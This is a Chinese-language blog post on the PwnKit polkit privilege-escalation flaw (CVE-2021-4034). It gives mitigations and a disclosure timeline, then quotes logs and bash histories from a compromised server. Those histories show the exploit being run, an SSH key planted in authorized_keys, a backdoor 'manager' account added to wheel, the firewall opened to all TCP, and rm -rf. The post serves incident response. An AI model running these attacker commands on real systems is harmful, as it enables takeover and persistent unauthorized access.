舊聞 ↓

Linux 12年漏洞可讓駭客以根權限執行程式碼,影響所有發行版

這個編號CVE-2021-4034的漏洞,存在於Linux的Polkit(前稱PolicyKit),因而漏洞又被稱為PwnKit。Polkit是管理Unix、Linux等OS全系統准許權限的元件,讓一般權限的行程(process)可和高權限行程互動。而Polkit中一項setuid程式pkexec,則可讓用戶以root權限執行指令。

你可以 POC /CVE-2021-4034測漏洞,會直接 su 到 root

暫時的解決辦法

chmod 0755 /usr/bin/pkexec

永久解決辦法 (或重灌新版 Linux)

yum update polkit -y

PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)

被報告上去的時間線

  • 2021-11-18: Advisory sent to secalert@redhat.
  • 2022-01-11: Advisory and patch sent to distros@openwall.
  • 2022-01-25: Coordinated Release Date (5:00 PM UTC).

如果你主機被入侵,可能會 ↓

建立一個 manager 使用者

more /var/log/secure

xxxxxxxxx sudoedit: pam_unix(sudo:auth): conversation failed
xxxxxxxxx sudoedit: pam_unix(sudo:auth): auth could not identify password for [xxxxxxxxx]
xxxxxxxxx sudo: xxxxxxxxx : user NOT in sudoers ; TTY=pts/0 ; PWD=/var/www/xxxxxxxxx ; USER=root ; COMMAND=sudoedit Y
xxxxxxxxx pkexec[5651]: xxxxxxxxx: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/var/www/xxxxxxxxx/tmp/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:. PATH=GCONV_PATH=. SHELL=/lol/i/do/not/exists CHARSET=PWNKIT GIO_USE_VFS=]
xxxxxxxxx su: pam_unix(su:session): session opened for user root by xxxxxxxxx(uid=0)
xxxxxxxxx sudo:     root : TTY=pts/0 ; PWD=/var/www/xxxxxxxxx/tmp/CVE-2021-4034 ; USER=root ; COMMAND=/bin/bash
xxxxxxxxx useradd[5759]: new group: name=manager, GID=10611
xxxxxxxxx useradd[5759]: new user: name=manager, UID=10611, GID=10611, home=/home/manager, shell=/bin/bash
xxxxxxxxx usermod[5764]: add 'manager' to group 'wheel'
xxxxxxxxx usermod[5764]: add 'manager' to shadow group 'wheel'
xxxxxxxxx passwd: pam_unix(passwd:chauthtok): password changed for manager

這個使用者作了提權的動作

more /home/manager/.bash_history

sudo -s
cd /var/www/xxxxxxxxx
ls
sudo -s
cd ~
pwd
mkdir tmp
cd tmp/
tar -xf pkexec.tar 
cd CVE-2021-4034/
./cve-2021-4034
exit

並在提權後作一些怪動作

more /root/.bash_history

 stty -echo nl lnext ^V ; export PS1=
 export PS1=;echo; echo OHwnW9JnBC; echo $$ 0</dev/null; R=$?; echo Fv6xkfIdcP; echo $R; echo qM3u2r6gC3
 export PS1=;echo; echo OoMNTdcsZ8; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo vt5FYTYuYt; echo $R; echo kmdHj4Qz5N
 export PS1=;echo; echo PyKh84RjvN; readlink /proc/5681/exe 0</dev/null; R=$?; echo wUCNvL88Kc; echo $R; echo dlcIwyDDC1
 export PS1=;echo; echo X52D2cVkpC; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo l99t9ta2Fl; echo $R; echo GZe4WH0efg stty sane ; stty rows 30 columns 120 ; export TERM='xterm-256color' ; export PS1='$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")' cd ../ rm -rf * cd ~/.ssh/ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFFQ7H4DxAEq4qAXGPUYAECPpbpvX0gX8YugJ/wu23igin3RXsFtMPnDqv0i0LAGHTinXut4NsR/1b8v/l0Lt0/E9RQEY4Op0Uilc8J8QB4EoKDZsk1qB8jBAXWACxkYehP2/cTFa61ELbV8NC1ybQZDe3qiQYS3fYePF901/ypPHGFhYkzCUSl3D2OK5wRmuEWdPO7gu0KFYnOR9coYHPeKCxf3ATUunYTTsWdHKt7A8cqYP3oTyv81wiRkogt5LQfYPtS1OWMqB2BvPZgX2pTaO50egpE6jsdd6o6MjZnTExJcN6gUm2fwkJGNASXJ82siJOFvrvRTQsizn5v3wpmM9urokj4LnxHUt8rahMkv/QuK1m6blLryOynh7sP6ug+cfA4lTZsc1mZPTDRlGGW/W6Q8e5XDyCYBXdHPkIXKo+Tj+00YKvKqMumu0Ibj4mfx/681qOcKGVKJxfmzDl3ej1pgU8YPTSVsF6bgdkWh1Ge3DCIXhlaX1oUz9mM9M= >> authorized_keys
adduser manager ;usermod -aG wheel manager ;passwd manager
cat /etc/ssh/sshd_config 
 stty -echo nl lnext ^V ; export PS1=
 export PS1=;echo; echo wCROl9Fj0r; echo $$ 0</dev/null; R=$?; echo GflPaErpcn; echo $R; echo XGwHrNG2mo
 export PS1=;echo; echo mvxy44Lvj1; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo tlOJnr47Pr; echo $R; echo oGEC4gPEzH
 export PS1=;echo; echo Wqo4ZSKWue; readlink /proc/5681/exe 0</dev/null; R=$?; echo LVkPohakrr; echo $R; echo ftVS0U0Oi5
 export PS1=;echo; echo AzsRDhdRfL; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo ZsjDioQbF5; echo $R; echo JhUCDzYgG8
 stty sane ;  stty rows 30 columns 120 ;  export TERM='xterm-256color' ; export PS1='$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")'
cd /var/www/xxxxxxxxx
ls
systemctl status sshd
service sshd ststus
service sshd status
service sshd restart
sudo iptables -I INPUT 1 -p tcp -j ACCEPT
 stty -echo nl lnext ^V ; export PS1=
 export PS1=;echo; echo jRKw9yFasa; echo $$ 0</dev/null; R=$?; echo NZPIrVE43Y; echo $R; echo l1trwmUiai
 export PS1=;echo; echo mG25rB5Ivl; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo NZUG6G5fw6; echo $R; echo slyZcBlViH
 export PS1=;echo; echo UZ42oIvtdi; readlink /proc/5681/exe 0</dev/null; R=$?; echo vy7bhZQ4Ww; echo $R; echo ZWXBcMbYaV
 export PS1=;echo; echo tXCXQW5UNe; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo KnwQ5VvsLS; echo $R; echo jZzKcJeE1T
exit
sudo -s
su root
exit

 

最後修改日期: 2022 年 11 月 18 日
Related posts 相關文章

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。

8 × 1 =